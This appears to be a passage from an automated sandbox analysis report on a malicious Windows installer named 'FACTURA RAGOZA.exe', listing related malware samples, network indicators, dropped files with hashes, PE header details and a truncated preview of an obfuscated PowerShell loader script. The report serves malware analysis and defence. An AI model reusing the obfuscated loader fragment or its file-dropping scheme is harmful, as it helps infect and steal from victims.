	bin.i686.elf	Get hash	malicious	Gafgyt, Mirai	Browse	130.61.149.67
	LNLAncf2v5.elf	Get hash	malicious	Mirai, Okiru	Browse	150.136.183.134
	SecuriteInfo.com.Win32.TrojanX-gen.28573.1762.exe	Get hash	malicious	Unknown	Browse	168.138.162.78
	PROFOMA INVOICE 90021144577.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	la.bot.arm7.elf	Get hash	malicious	Unknown	Browse	130.61.64.122

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	Purchase Order.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	FACTURA DE PAGO.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	PAGO FRAS. AGOSTO 2024..exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	#U304a#U898b#U7a4d#U308a#U4f9d#U983c.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.97.3
	RFQ-KTE-07102024.pdf.scr	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	rRFQ24201007_pdf.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	PROFOMA INVOICE 90021144577.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	routcrying.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	mnobizx.com.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	SecuriteInfo.com.Win32.DropperX-gen.11998.28068.exe	Get hash	malicious	Atlantida Stealer	Browse	188.114.97.3
3b5074b1b5d032e5620f69f9f700ff0e	Purchase Order.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Spedizione.vbs	Get hash	malicious	Unknown	Browse	149.154.167.220
	FACTURA DE PAGO.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	PAGO FRAS. AGOSTO 2024..exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	https://weiderergmbh-my.sharepoint.de/:o:/g/personal/s_kreuzer_luxapark_de/En8ihQEtXF1HtuEzkWTEmvQBXZUe8GC_guY4c0qSMi2Czg?e=5%3aJCIXIb&at=9	Get hash	malicious	Unknown	Browse	149.154.167.220
	rIMG465244247443GULFORDEROpmagasinering.cmd	Get hash	malicious	Remcos, GuLoader	Browse	149.154.167.220
	Documenti di spedizione.bat.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	149.154.167.220
	RFQ-KTE-07102024.pdf.scr	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	rRFQ24201007_pdf.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	http://heks.egrowbrands.com/lopsa/67057a2256a25_SwiftKey.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
37f463bf4616ecd445d4a1937da06e19	Spedizione.vbs	Get hash	malicious	Unknown	Browse	142.250.184.225 142.250.186.174
	FACTURA DE PAGO.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	142.250.184.225 142.250.186.174
	PAGO FRAS. AGOSTO 2024..exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	142.250.184.225 142.250.186.174
	rIMG465244247443GULFORDEROpmagasinering.cmd	Get hash	malicious	Remcos, GuLoader	Browse	142.250.184.225 142.250.186.174
	450707124374000811.exe	Get hash	malicious	GuLoader	Browse	142.250.184.225 142.250.186.174
	450707124374000811.exe	Get hash	malicious	GuLoader	Browse	142.250.184.225 142.250.186.174
	3507071243740008011.exe	Get hash	malicious	GuLoader	Browse	142.250.184.225 142.250.186.174
	Unlock_Tool_2.3.1.exe	Get hash	malicious	Vidar	Browse	142.250.184.225 142.250.186.174
	3507071243740008011.exe	Get hash	malicious	GuLoader	Browse	142.250.184.225 142.250.186.174
	aZm1EZ2IYr.exe	Get hash	malicious	Vidar	Browse	142.250.184.225 142.250.186.174

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	14744
Entropy (8bit):	4.992175361088568
Encrypted:	false
SSDEEP:	384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA
MD5:	A35685B2B980F4BD3C6FD278EA661412
SHA1:	59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062
SHA-256:	3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930
SHA-512:	70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ifvhfv4.o2u.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fkoa3b0y.fap.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qdmeaber.j2j.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yw5dnaeu.yh1.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Eeriness.Jen

Download File

Process:	C:\Users\user\Desktop\FACTURA RAGOZA.exe
File Type:	ASCII text, with very long lines (3155), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	53892
Entropy (8bit):	5.317196652742674
Encrypted:	false
SSDEEP:	768:uZO8t25IA76eZYpd1LpO8b9a8TkKBorle3uAKAF9ptPwejG4HdjdeZi3JV8dUYM6:VEjiYlO09/zYeV7zPG49jdBcB
MD5:	E2E26C97990DA8CB9C55EE8C58B978B7
SHA1:	234394C3B09003F750F25FCA64FA913AF426E2B0
SHA-256:	E0811F5BD681F1D6F459BFF5A17D9ECA6C0EB20D715B6B0D2226F716A27716DF
SHA-512:	00884CCBDDC2236D90029FA120B500CA2253574B00621BF74D41D04B89337F54A253837D477B7BB0F5D99C58E6A16E53C4BF5A2F5CA75AE345DF5FEAEF25C5A2
Malicious:	true
Preview:	$undertrykte=$colistin;..<#Aborren Inkasseredes Snefygningen Ejendomsmglervirksomhed Skulptr #>..<#Bonelike Tassal Compregnate Magnetizers Floskulaturens Ruskomsnuskens Bagtppets #>..<#Formlre Pretabulation fransiskas Unangered Overfrieze #>..<#Asylstrid Prostitution bekkasin #>..<#Duff Hypostomata Cribbled Bigotish Casas Fragmentariness fortryllelse #>..<#Unirascible liefly Frdselslove Adresseringsmetode Returneringerne Svenskekrigene Frontales #>...$Burliest = @'.br,ek. No t$StjmaRGiddyaVedhovSei eeSerial tes,i Hjejn CapeeRecomrg yco=Coiff$FelthKImperaEntozsSemirhDrejsuIl.umb lineForma;Precy.BlokhfFornduYa.innTodelcBiomatVassaiOphaeoLdrein dst DromeS CurrtUlempaNo sys Tr csDildofSk aluintrar erlitGlossiOrdritKont eTjurh Heli(Sno s$.nderT Oppie NonpkO.erwsRecomtKikismSk.heoT xipdresinekondi,Calli$CoherU besvrCi ataUdmelnHet ro pswsK stvtRad.oaTrykpp AppehAxiomytarsolFyrsko orumpMetaclAfskyaAnsttsUdsugtFreudyRumaf)Mod m Untra{Pt le.Reatt. caco$ Abasa anornUnaffaHemopcB,oodr JacuuEn

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Subjektiverer\FACTURA RAGOZA.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	860646
Entropy (8bit):	7.707140845812096
Encrypted:	false
SSDEEP:	12288:l98Xpcv5nBOae+1lEPE5PyZHIETeVlCE7vkQymGwSW01hXqvjoaCi7lnsZz0mas:/Mp0OzolUHI+alCJmvulW6Nd0vs
MD5:	8B7D3863A10666B5B4FCA4230C413755
SHA1:	1125D82C42BB40664961EE5B57D29DA65CD300B0
SHA-256:	7C4A22D1264CF34A71CCE344A1A5E38BBE50AB5BF7BD560D98E04759C1BD6029
SHA-512:	16CB86BC69971E7B97A229F7D4BA7ABD33D1EEA721980F794C8472DD549B263758DBCD68A3B9269FEFE255560DC820612AD9EE819AAAB692B12073C93AD7B5A9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 11%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F......F...G.v.F......F..v...F...@...F.Rich..F.........................PE..L....{.W.................`...\|.......1.......p....@.......................................@.................................4u....... ..X............................................................................p...............................text...._.......`.................. ..`.rdata..R....p.......d..............@..@.data....T...........x..............@....ndata...0...............................rsrc...X.... .......~..............@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Subjektiverer\FACTURA RAGOZA.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Subjektiverer\discourteously.gam

Download File

Process:	C:\Users\user\Desktop\FACTURA RAGOZA.exe
File Type:	GTA audio index data (SDT)
Category:	dropped
Size (bytes):	339224
Entropy (8bit):	3.2329059465811363
Encrypted:	false
SSDEEP:	3072:TlwUufGWwltoSeWq5Xck5tiy5ScV95Cca+8aB5p0jsDytfuWoaP/ZTf:x3W045X/5tiyB8faB5p4sD22uN
MD5:	2AFAF6367CF5833A8885999FEFA5B44A
SHA1:	58EDFAC56FD3BDA98CAD7F2A784F58CF0CCCA5A9
SHA-256:	66D0440913A064549BF52DD102475A422A55A0A1A99A38C0445CCF84EB98C074
SHA-512:	A769F552CD91CE7163FE25C6E785D3A225979A9E50805F031C05E52CF5F82FB1E582FE621C947C7B0709F9E627C6CF318CF899CA97CC2BC4A3D934B94C2279A4
Malicious:	false
Preview:	........5M.....]...................[8...........t...........j.kKk.............Y.3.-.........u.....'.......<..............0..............-.....m....q.%.........S....F......6.............M.C.z.........m.\|..............m...].-..<.......0.............o......QL....x....... ..........p.........?.'.a........:.........K............................#............Z).......$......................................9......................_u...1...S>............................c....K\......l.......z............%..(..........8...........z.........\....$......._.g...........v.....{R..............;.............R........1........:...Q...........W..W....................................F .....-...b..F........G...,CH......}...D....b...........9...8...q......Y....R..............................................<..............=...~................. ...........u.......T...B..............i............`....r...........R..............1.2........................../....#.......b.............;...............-..+

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Subjektiverer\psychograph.rut

Download File

Process:	C:\Users\user\Desktop\FACTURA RAGOZA.exe
File Type:	data
Category:	dropped
Size (bytes):	91155
Entropy (8bit):	3.2484639775571122
Encrypted:	false
SSDEEP:	768:sx0eYUpSjZTH4Refp/ZwLfKCGhiKveAC4LjJNV8RHwnx/F0H0jbPYER9RLXLxFJi:8UhyD9meQZFRRbLXdDRseVQq4
MD5:	55DD84338306B8F361571D07E3D03F25
SHA1:	5F086147B0ED6D4CBE40B6F81C1003EB07714B94
SHA-256:	016DE5BD5CEBA70CD0041265F69BE3BB6FF54D3DCA19340ED44DC15317066E45
SHA-512:	045E39931094C1D423D69C4BEF750CACF56E0DEF562162211F51F1B5E0C3E265ACEDE7FC06979CFCE68762A99180317419685E5542D3E44882B11116D1EE7FE8
Malicious:	false
Preview:	....7.................3.........}.......Q.....................~........y.........u...4...bp..o......z.......................................................k.............Tg.....`..Q.........<........A........f.....X..."..............^.........@....\|..........................h....X..................1.......zh...........3..>..)...Y....:.................GG.....+F#...z.~.....!....................:..............(.................Y....7.......5..^..{.......D...`................O..............z#..............4$...a..............o....................c..s.......=......^..~..................................B....o.......................................l:...........*Y..i.".C..i............_.........).....-...............\|P.......b......h....~.....w+....................-....1.......<...6.........b.".@...................1...P....s..h9.......l........H..................k...e........<.......f...;...............m....W...........h.g.%...........-........."..................S......F.....e........

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Subjektiverer\strudsfjerenes.uns

Download File

Process:	C:\Users\user\Desktop\FACTURA RAGOZA.exe
File Type:	data
Category:	dropped
Size (bytes):	411197
Entropy (8bit):	3.2412073600303604
Encrypted:	false
SSDEEP:	6144:QuopzWTN5dkmo9X81LoYHLr0FJfFYcRQOD:KkxkfDEC
MD5:	9548F6F7A71852794789DE0AC5FDE451
SHA1:	74C915E2C9C110929FD87C907BE17930B0B66B24
SHA-256:	2D3371072047972236B2BAD7280E34BA1FD041C99CD132BC0E1DD767D0AFC471
SHA-512:	0468FCA29C3F916CBC0B3B132EA24BB582ED0F0D4921523F5DF6EE17F76709437D25324E08AF3C43FCAE8BD1B9F388E49B64ED3C8464062E7D099B0D6B9BC5DE
Malicious:	false
Preview:	....u...........................................................#.k4..`.......K....................7F#.....-....................Z.........v.................#.............p...<.....5.j...........p....j....... 4.....h................q.2.......C..................................,.............\........#..................e..........b.........................o..8.e........'.Q......<..........e.x...8......=.......}.....QU......E.....O............................6....^.y.....~........i..........................Q..`.>...........m..........,................6/..._..f....\.........`.y.............................6...............2[........................)..........................<....7......6..................8.....................................b...........................3.....U.......N.........k8.x.........................)~..............o.....+.............6............Y.>....................e.J....S...t..........K........................P\.............r...................... ............

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Subjektiverer\unnamed.jpg

Download File

Process:	C:\Users\user\Desktop\FACTURA RAGOZA.exe
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 512x512, components 3
Category:	dropped
Size (bytes):	15845
Entropy (8bit):	7.693658939604953
Encrypted:	false
SSDEEP:	384:dnSPb8riksvdEh0qrjVqIPrLgrpNQMUBWud20p:dnUwriksvMjrZqo3Up9U8ud20p
MD5:	762778DFE1B62D3430B44A32AEDC03E0
SHA1:	7317D9579F9F4C4BEF82BE64FB3DFFB63160EEC5
SHA-256:	9A602EBAFC1F46AAD7248F6DA82938CE382DE9FFBC6C472BD4848D4519CA67A8
SHA-512:	B39A8F6DC07F3A4CFE3CF5E1563543ECE2864FECED28282356FA64D7D0B50FA43B70F57FC8A2C4424A553E14E6BE526293D90F56C63994EC79F5520488EE0CCF
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..IE..'...Ph.....(....(...)(...(....(...J`.QI@.(....(.....(....(....)(...).f..(.......Q@.%.P.IE..RQE...Q@..).RQE...Q@.%.P.IE...%.P.IE..RQE.mQE..bQE..QE%..QE......QE%..QE.......QI@..Q@.%.P.IE..RQE..QI@..RP.E.....RS.i(...%.P.IE%.-%.P.IE..RQE...Q@..).RQE...Q@.%.P0....J(...-%.P.IE...IE..aE...QE..QE%..QE.%.Q@...S...J..QI@.IE..RQE...Q@..RP.E...QE%0.(...%...-%...QE..RQE...Q@.%.P0

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\aktivitetsrunde.txt

Download File

Process:	C:\Users\user\Desktop\FACTURA RAGOZA.exe
File Type:	ASCII text, with very long lines (360), with CRLF line terminators
Category:	dropped
Size (bytes):	362
Entropy (8bit):	4.295609901239941
Encrypted:	false
SSDEEP:	6:OV0mI/AA3CU6sDq6ry0bxmAOvFz0/TWEMsesxM7JXZO:OVcAV6yw3Ovx0/q3shK7Js
MD5:	A47DE65B255D62E154E75208730B37D2
SHA1:	9AD95C489EABDBCD12C02CD312C85D0C73A565F7
SHA-256:	1527C27BE377FB2EFDB75E64EF88FEE6B879712DEC1AE6E8CCA4E66188099784
SHA-512:	206FB780CA6A6BEA7B1DA2AAD8D1E8C38331AE5A03CC82FC181A6E13234DC4523033AA775A3F15C261FEC74910ECAF622ABAC99444E8DAA8B63EC35379FBE29A
Malicious:	false
Preview:	beboere sletteprogrammerne afbrndtes untruthfulness,methanolysis blokniveauets tegnbaseret keisar arbejdsmndene rger,lsenets quindecimvir complexify hundevagten cymblernes.cressier immediate batchkrslerne antisepalous cryptonymic pings,pampination spytkirtlen vandranunkel stormmaage,diversificer udtalendes attributgrammatiks snedkeris sati frailejon rvturene..

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\taberen.Dip

Download File

Process:	C:\Users\user\Desktop\FACTURA RAGOZA.exe
File Type:	data
Category:	dropped
Size (bytes):	293793
Entropy (8bit):	7.748532101525894
Encrypted:	false
SSDEEP:	6144:3gqeG+ObqDKb+LKzfHF/CqN8Wz6hqsGhZbc8Jql4:3leOJb+LKbF/fN8Wz6qsgw8R
MD5:	006A7FE830222E5B57EBA75A6E9CE31C
SHA1:	06F6E61B056315776FE7489074D8E2BE4E23A92D
SHA-256:	B52CFBB096D82C77A39EA1F3D6CF853B4E193BC457D4ED7376060C21B76D4975
SHA-512:	A790161840B5A8373D5DD9A7D354762A422595E4FDB87FAB039E6A64DA9E9C32300645D5FDDF8E96B2EF8FA70BE4069B05F8C93B160AB19699CECA8FA045774D
Malicious:	false
Preview:	...EEE.DDDD..........C..Q..PP.44................[.??....N.....ggg......++.cccc............KKKKKK....\|..............II........++...............................................r....................x................FF.&&&.LL..............PP.,,,........0.....n........M....''''...........[[...............zz...kkk..................a.T...........y.y...............mm........iii.......xxxx..........v...LL.;;;........yy...........kkkk........ll.?.......#...ww.................................7......&..9.......xxx............/.S........................N....O..OO..........22...........{{{{.......~..........._.....oo...................................L............((............++.=......{{{.h..>................S.3........##......666.......e........(......^.............................DD...................MMM......................~~~.............+++..........HHHHHH...a.........Q.....................Q......r.........DD...............K................O..TT...s......................h...........N........

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.707140845812096
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	FACTURA RAGOZA.exe
File size:	860'646 bytes
MD5:	8b7d3863a10666b5b4fca4230c413755
SHA1:	1125d82c42bb40664961ee5b57d29da65cd300b0
SHA256:	7c4a22d1264cf34a71cce344a1a5e38bbe50ab5bf7bd560d98e04759c1bd6029
SHA512:	16cb86bc69971e7b97a229f7d4ba7abd33d1eea721980f794c8472dd549b263758dbcd68a3b9269fefe255560dc820612ad9ee819aaab692b12073c93ad7b5a9
SSDEEP:	12288:l98Xpcv5nBOae+1lEPE5PyZHIETeVlCE7vkQymGwSW01hXqvjoaCi7lnsZz0mas:/Mp0OzolUHI+alCJmvulW6Nd0vs
TLSH:	AE051246FBA8E8B7E822C17024EFD931E160AC350562960B335A7F7A487377D091F6D9
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F......F...G.v.F......F...v...F...@...F.Rich..F.........................PE..L....{.W.................`...\|.....

File Icon


Icon Hash:	4ccc524656d64e01

Static PE Info

General

Entrypoint:	0x40310f
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x57807BD9 [Sat Jul 9 04:21:45 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b78ecf47c0a3e24a6f4af114e2d1f5de

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409198h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [004070A8h]
call dword ptr [004070A4h]
cmp ax, 00000006h
je 00007F582128CE83h
push ebx
call 00007F582128FDF1h
cmp eax, ebx
je 00007F582128CE79h
push 00000C00h
call eax
mov esi, 00407298h
push esi
call 00007F582128FD6Dh
push esi
call dword ptr [004070A0h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007F582128CE5Dh
push ebp
push 00000009h
call 00007F582128FDC4h
push 00000007h
call 00007F582128FDBDh
mov dword ptr [0042E404h], eax
call dword ptr [00407044h]
push ebx
call dword ptr [00407288h]
mov dword ptr [0042E4B8h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 00428828h
call dword ptr [00407174h]
push 00409188h
push 0042DC00h
call 00007F582128F9E7h
call dword ptr [0040709Ch]
mov ebp, 00434000h
push eax
push ebp
call 00007F582128F9D5h
push ebx
call dword ptr [00407154h]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7534	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x42000	0x1aa58	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x298	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5fdd	0x6000	38462d04cfdbc4943d18be461d53cc3e	False	0.6783854166666666	data	6.499697507009752	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x1352	0x1400	3d134ae5961af9895950a7ee0adc520a	False	0.4583984375	data	5.207538993430304	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x254f8	0x600	2d00401e0c64d69b6d0ccb877d9f624e	False	0.4544270833333333	data	4.0323505938358934	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2f000	0x13000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x42000	0x1aa58	0x1ac00	098718c0c5bf54afe6e125c2f1ac35ba	False	0.23448452102803738	data	3.706045365348602	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_BITMAP	0x42460	0x368	Device independent bitmap graphic, 96 x 16 x 4, image size 768	English	United States	0.23623853211009174
RT_ICON	0x427c8	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 0	English	United States	0.09021944871643203
RT_ICON	0x52ff0	0x32f2	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9443336911516639
RT_ICON	0x562e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	United States	0.16089211618257263
RT_ICON	0x58890	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	United States	0.18738273921200752
RT_ICON	0x59938	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	United States	0.31050106609808104
RT_ICON	0x5a7e0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	United States	0.440884476534296
RT_ICON	0x5b088	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	United States	0.5635838150289018
RT_ICON	0x5b5f0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	United States	0.2703900709219858
RT_ICON	0x5ba58	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	United States	0.21908602150537634
